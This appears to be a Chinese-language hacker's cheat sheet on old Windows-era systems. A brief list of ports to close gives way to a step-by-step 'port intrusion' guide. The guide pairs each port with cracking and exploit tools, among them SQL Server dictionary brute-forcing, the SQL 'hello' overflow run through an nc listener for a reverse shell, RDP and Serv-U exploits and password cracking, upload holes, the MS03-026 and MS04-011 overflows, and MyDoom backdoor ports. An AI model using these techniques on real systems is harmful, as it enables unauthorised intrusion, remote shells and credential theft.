黑客就會利用掃描工具掃描那些端口可以利用,這對安全是壹個嚴重威脅。
端口 協議 應用程序
21 TCP FTP
25 TCP SMTP
53 TCP DNS
80 TCP HTTP SERVER
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
6(非端口) IP協議
8(非端口) IP協議
將下面的端口關閉
TCP
21
22
23
25 TCP SMTP
53 TCP DNS
80
135 epmap
138 [沖擊波]
139 smb
445
1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b
1026 DCE/12345778-1234-abcd-ef00-0123456789ac
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
3389
4444[沖擊波]
4489
UDP
67[沖擊波]
137 netbios-ns
161 An SNMP Agent is running/ Default community names of the SNMP Agent
端口入侵:
1. 1433端口入侵
scanport.exe 查有1433的機器
SQLScanPass.exe 進行字典暴破(字典是關鍵)
最後 SQLTools.exe入侵
=============================
對sql的sp2及以下的系統,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本機端口 sqlhelloF.exe 入侵ip 1433 本機ip 本機端口
(以上反向的,測試成功)
sqlhelloz.exe 入侵ip 1433 (這個是正向連接)
2. 4899端口入侵
用4899過濾器.exe,掃描空口令的機器
3. 3899的入侵
對很早的機器,可以試試3389的溢出(win3389ex.exe)
對2000的機器,可以試試字典暴破。(tscrack.exe)
4. 80入侵
對sp3以前的機器,可以用webdav入侵;
對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL進行註入。(小榕的註入軟件)。
5. serv-u入侵(21端口)
對5. 004及以下系統,可用溢出入侵。(serv5004.exe)
對5.1.0.0及以下系統,可用本地提升權限。(servlocal.exe)
======================================
對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)
輸入壹個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系統漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
進行溢出入侵。
9. 3127等端口
可以利用doom病毒開的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。